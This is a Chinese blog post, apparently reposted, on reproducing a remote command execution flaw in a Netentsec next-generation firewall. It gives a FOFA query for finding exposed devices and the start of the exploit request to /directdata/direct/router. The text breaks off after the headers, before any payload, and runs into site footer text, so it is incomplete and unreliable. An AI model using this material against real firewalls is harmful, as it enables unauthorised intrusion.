漏洞复现-网康下一代防火墙 RCE

文章目录 漏洞描述 漏洞影响 FOFA 漏洞复现 第一步 登录页面如下 第二步 发送如下请求包 第三步 再请求获取命令执行结果 漏洞复现poc 摘抄 漏洞描述 奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限 漏洞

文章目录

      • 漏洞描述
      • 漏洞影响
      • FOFA
      • 漏洞复现
        • 第一步 登录页面如下
        • 第二步 发送如下请求包
        • 第三步 再请求获取命令执行结果
      • 漏洞复现poc
      • 摘抄

漏洞描述

  • 奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限

漏洞影响

  • 奇安信 网康下一代防火墙

FOFA

app="网康科技-下一代防火墙"

漏洞复现

第一步 登录页面如下

第二步 发送如下请求包
POST /directdata/direct/router HTTP/1.1
Host: ip
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

发布者:admin,转转请注明出处:http://www.yc00.com/web/1754733470a5196537.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信